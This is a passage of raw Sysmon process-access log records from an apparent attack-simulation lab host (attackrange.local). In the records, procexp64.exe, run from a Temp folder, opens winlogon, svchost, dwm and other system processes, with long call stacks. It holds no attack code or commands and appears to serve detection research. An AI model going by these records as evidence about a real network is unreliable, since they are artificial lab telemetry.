(x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.721{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.705{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\